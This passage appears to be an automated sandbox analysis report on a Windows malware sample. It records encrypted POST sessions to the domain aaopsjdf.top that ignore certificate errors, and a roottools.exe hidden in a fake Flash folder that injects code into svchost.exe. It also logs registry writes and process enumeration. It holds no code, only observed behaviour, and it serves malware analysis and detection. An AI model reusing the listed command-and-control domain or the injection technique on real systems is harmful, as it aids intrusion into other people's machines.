User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	aaopsjdf.top
Server Port	443
Data Sent	0.71 KB (728 bytes)
Data Received	391.61 KB (401008 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = aaopsjdf.top, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /bjJ0Il/u/GwDYfpQFveklLDcx/iq/qRQ, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close hÏ@, url = aaopsjdf.top/bjJ0Il/u/GwDYfpQFveklLDcx/iq/qRQ	1	Fn
Send HTTP Request	headers = Connection: close hÏ@, url = aaopsjdf.top/bjJ0Il/u/GwDYfpQFveklLDcx/iq/qRQ	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 4096, size_out = 4096	3	Fn Data
Read Response	size = 4096, size_out = 3883	1	Fn Data
Read Response	size = 4096, size_out = 4096	12	Fn Data
Read Response	size = 4096, size_out = 4087	1	Fn Data
Read Response	size = 4096, size_out = 4096	23	Fn Data
Read Response	size = 4096, size_out = 4088	1	Fn Data
Read Response	size = 4096, size_out = 4096	7	Fn Data
Read Response	size = 4096, size_out = 4088	1	Fn Data
Read Response	size = 4096, size_out = 4096	7	Fn Data
Read Response	size = 4096, size_out = 4088	1	Fn Data
Read Response	size = 4096, size_out = 4096	7	Fn Data
Read Response	size = 4096, size_out = 4087	1	Fn Data
Read Response	size = 4096, size_out = 4096	32	Fn Data
Read Response	size = 4096, size_out = 3947	1	Fn Data
Read Response	size = 4096, size_out = 0	1	Fn
Close Session	-	8	Fn

HTTP Session #10

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	aaopsjdf.top
Server Port	443
Data Sent	0.72 KB (736 bytes)
Data Received	487.84 KB (499548 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = aaopsjdf.top, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /Yjc2A8Gst/g/2/wqY_IEM-6a_ZPTl/gH/YMg, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close 3hÏ@, url = aaopsjdf.top/Yjc2A8Gst/g/2/wqY_IEM-6a_ZPTl/gH/YMg	1	Fn
Send HTTP Request	headers = Connection: close 3hÏ@, url = aaopsjdf.top/Yjc2A8Gst/g/2/wqY_IEM-6a_ZPTl/gH/YMg	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 4096, size_out = 4096	3	Fn Data
Read Response	size = 4096, size_out = 3883	1	Fn Data
Read Response	size = 4096, size_out = 4096	12	Fn Data
Read Response	size = 4096, size_out = 4087	1	Fn Data
Read Response	size = 4096, size_out = 4096	15	Fn Data
Read Response	size = 4096, size_out = 4088	1	Fn Data
Read Response	size = 4096, size_out = 4096	7	Fn Data
Read Response	size = 4096, size_out = 4088	1	Fn Data
Read Response	size = 4096, size_out = 4096	7	Fn Data
Read Response	size = 4096, size_out = 4088	1	Fn Data
Read Response	size = 4096, size_out = 4096	7	Fn Data
Read Response	size = 4096, size_out = 4087	1	Fn Data
Read Response	size = 4096, size_out = 4096	65	Fn Data
Read Response	size = 4096, size_out = 87	1	Fn Data
Read Response	size = 4096, size_out = 0	1	Fn
Close Session	-	8	Fn

HTTP Session #11

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	aaopsjdf.top
Server Port	443
Data Sent	0.72 KB (736 bytes)
Data Received	20.78 KB (21276 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = aaopsjdf.top, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /IPPKGT6kjF/k1/YZGv/RoQvaE4rDg9/AunIQ, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close hÏ@, url = aaopsjdf.top/IPPKGT6kjF/k1/YZGv/RoQvaE4rDg9/AunIQ	1	Fn
Send HTTP Request	headers = Connection: close hÏ@, url = aaopsjdf.top/IPPKGT6kjF/k1/YZGv/RoQvaE4rDg9/AunIQ	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 4096, size_out = 4096	3	Fn Data
Read Response	size = 4096, size_out = 3883	1	Fn Data
Read Response	size = 4096, size_out = 4096	1	Fn Data
Read Response	size = 4096, size_out = 1005	1	Fn Data
Read Response	size = 4096, size_out = 0	1	Fn
Close Session	-	8	Fn

HTTP Session #12

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	aaopsjdf.top
Server Port	443
Data Sent	0.71 KB (730 bytes)
Data Received	36.40 KB (37276 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = aaopsjdf.top, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /X8CyRU/gj4KKOFp/LKWt3avl_/H/ijD/A, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close hÏ@, url = aaopsjdf.top/X8CyRU/gj4KKOFp/LKWt3avl_/H/ijD/A	1	Fn
Send HTTP Request	headers = Connection: close hÏ@, url = aaopsjdf.top/X8CyRU/gj4KKOFp/LKWt3avl_/H/ijD/A	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 4096, size_out = 4096	3	Fn Data
Read Response	size = 4096, size_out = 3883	1	Fn Data
Read Response	size = 4096, size_out = 4096	5	Fn Data
Read Response	size = 4096, size_out = 621	1	Fn Data
Read Response	size = 4096, size_out = 0	1	Fn
Close Session	-	8	Fn

Process #25: svchost.exe

(Host: 3702, Network: 0)

Information	Value
ID	#25
File Name	c:\windows\syswow64\svchost.exe
Command Line	C:\Windows\SysWOW64\svchost.exe -k netsvcs
Initial Working Directory	C:\Users\aETAdzjz\AppData\Roaming\
Monitor	Start Time: 00:07:38, Reason: Child Process
Unmonitor	End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration	00:02:35

OS Process Information

Information	Value
PID	0x7e0
Parent PID	0x7e8 (c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f83e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x F4 0x 610 0x 654 0x 694 0x 414 0x 4D0 0x 7AC 0x 4BC 0x 3A4 0x 6B0 0x 46C

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
imm32.dll	0x00020000	0x0003dfff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x00026fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00031fff	Pagefile Backed Memory	Readable, Writable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000070000	0x00070000	0x0008bfff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000000090000	0x00090000	0x000cffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000090000	0x00090000	0x0009bfff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000090000	0x00090000	0x0009afff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	Readable, Writable	Region Actions
rsaenh.dll	0x000f0000	0x0012bfff	Memory Mapped File	Readable	Region Actions
private_0x00000000000f0000	0x000f0000	0x0012ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000130000	0x00130000	0x0016ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000170000	0x00170000	0x001affff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x001b0000	0x00216fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000240000	0x00240000	0x0027ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000002c0000	0x002c0000	0x002fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000330000	0x00330000	0x0036ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000380000	0x00380000	0x0038ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000003a0000	0x003a0000	0x003dffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000400000	0x00400000	0x0047ffff	Private Memory	Readable, Writable	Region Actions
svchost.exe	0x004a0000	0x004a7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00000000004f0000	0x004f0000	0x0052ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000550000	0x00550000	0x0058ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000005d0000	0x005d0000	0x0060ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000630000	0x00630000	0x0072ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000730000	0x00730000	0x008b7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000008c0000	0x008c0000	0x00a40fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000a50000	0x00a50000	0x01e4ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001e50000	0x01e50000	0x02242fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000002250000	0x02250000	0x0245ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002260000	0x02260000	0x0229ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000022b0000	0x022b0000	0x022effff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002350000	0x02350000	0x0238ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000023a0000	0x023a0000	0x023dffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000023e0000	0x023e0000	0x0245ffff	Private Memory	Readable, Writable	Region Actions
sortdefault.nls	0x02460000	0x0272efff	Memory Mapped File	Readable	Region Actions
private_0x0000000002760000	0x02760000	0x0279ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000027d0000	0x027d0000	0x0280ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002870000	0x02870000	0x028affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000028c0000	0x028c0000	0x028fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002900000	0x02900000	0x029fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002a70000	0x02a70000	0x02aaffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002b00000	0x02b00000	0x02b3ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002b70000	0x02b70000	0x02baffff	Private Memory	Readable, Writable	Region Actions
wow64cpu.dll	0x743d0000	0x743d7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x743e0000	0x7443bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x74440000	0x7447efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x75630000	0x7566afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x75670000	0x75685fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
secur32.dll	0x75690000	0x75697fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x75800000	0x7580bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x75810000	0x7586ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x758c0000	0x759bffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x759c0000	0x75acffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x75ad0000	0x75ad4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x75ae0000	0x75c3bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iertutil.dll	0x75c40000	0x75e3afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x75e70000	0x75f1bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wininet.dll	0x75f20000	0x76014fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x760b0000	0x7610ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76110000	0x761acfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x761b0000	0x7623efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x76240000	0x7635cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x76360000	0x7636bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x76370000	0x763c6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x76570000	0x7663bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x76640000	0x76685fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
urlmon.dll	0x76690000	0x767c5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x767d0000	0x767e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x76800000	0x768effff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x768f0000	0x768f9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76950000	0x769dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x76a70000	0x776b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x77740000	0x777dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00000000778b0000	0x778b0000	0x779a9fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x00000000779b0000	0x779b0000	0x77acefff	Private Memory	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77ad0000	0x77c78fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77cb0000	0x77e2ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007ef9b000	0x7ef9b000	0x7ef9dfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ef9e000	0x7ef9e000	0x7efa0fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efa1000	0x7efa1000	0x7efa3fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efa4000	0x7efa4000	0x7efa6fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efa7000	0x7efa7000	0x7efa9fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efaa000	0x7efaa000	0x7efacfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efad000	0x7efad000	0x7efaffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efd5000	0x7efd5000	0x7efd7fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Injection Information

Injection Type	Source Process	Source Os Thread ID	Injection Info	Count	Logfile
Modify Memory	#22: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x7b4	address = 0x70000, size = 114688	1	Fn Data
Modify Memory	#22: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x7b4	address = 0x876c4, size = 4	1	Fn Data
Modify Memory	#22: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x7b4	address = 0x877d0, size = 4	1	Fn Data
Modify Memory	#22: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x7b4	address = 0x87d38, size = 4	1	Fn Data
Create Remote Thread	#22: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x7b4	address = 0x795bc	1	Fn

Host Behavior

File (2)

Operation	Filename	Additional Information	Success	Count	Logfile
Get Info	C:\Users\aETAdzjz\AppData\Local\Temp\pyidom	type = file_attributes		1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Temp\usontoi	type = file_attributes		1	Fn

Registry (49)

Operation	Key	Additional Information	Count	Logfile
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	2	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	7	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	4	Fn
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	4	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_BINARY	6	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	4	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Eteg, type = REG_BINARY	4	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_BINARY	4	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Eteg, type = REG_BINARY	2	Fn Data
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, size = 1776, type = REG_BINARY	1	Fn Data
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, size = 1776, type = REG_BINARY	1	Fn Data

Process (2378)

Operation	Process	Additional Information	Count	Logfile
Open	System	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\smss.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\program files\uninstall information\devon stickers.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\winlogon.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\services.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\lsass.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\lsm.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\audiodg.exe	desired_access = PROCESS_QUERY_INFORMATION	72	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\spoolsv.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_QUERY_INFORMATION	55	Fn
Open	c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe	desired_access = PROCESS_QUERY_INFORMATION	76	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_QUERY_INFORMATION	56	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_QUERY_INFORMATION	56	Fn
Open	c:\windows\system32\taskeng.exe	desired_access = PROCESS_QUERY_INFORMATION	72	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	56	Fn
Open	c:\program files (x86)\google\luxury-westminster-editing-cube.exe	desired_access = PROCESS_QUERY_INFORMATION	76	Fn
Open	c:\program files\windows photo viewer\eagles_podcast_type_marker.exe	desired_access = PROCESS_QUERY_INFORMATION	76	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	76	Fn
Open	c:\windows\syswow64\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	56	Fn
Open	c:\windows\system32\wbem\wmiprvse.exe	desired_access = PROCESS_QUERY_INFORMATION	50	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_QUERY_INFORMATION	44	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_QUERY_INFORMATION	45	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_QUERY_INFORMATION	45	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	45	Fn
Open	c:\windows\syswow64\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	45	Fn
Open	c:\windows\system32\wbem\wmiprvse.exe	desired_access = PROCESS_QUERY_INFORMATION	5	Fn
Open	c:\windows\system32\wbem\wmiprvse.exe	desired_access = PROCESS_QUERY_INFORMATION	40	Fn

Module (228)

Operation	Module	Additional Information	Count	Logfile
Load	KERNEL32.dll	base_address = 0x759c0000	1	Fn
Load	USER32.dll	base_address = 0x758c0000	1	Fn
Load	CRYPT32.dll	base_address = 0x76240000	1	Fn
Load	ADVAPI32.dll	base_address = 0x77740000	1	Fn
Load	SHELL32.dll	base_address = 0x76a70000	1	Fn
Load	SHLWAPI.dll	base_address = 0x76370000	1	Fn
Load	PSAPI.DLL	base_address = 0x75ad0000	1	Fn
Load	ole32.dll	base_address = 0x75ae0000	1	Fn
Load	GDI32.dll	base_address = 0x76950000	1	Fn
Load	WININET.dll	base_address = 0x75f20000	1	Fn
Load	urlmon.dll	base_address = 0x76690000	1	Fn
Load	OLEAUT32.dll	base_address = 0x761b0000	1	Fn
Load	Secur32.dll	base_address = 0x75690000	1	Fn
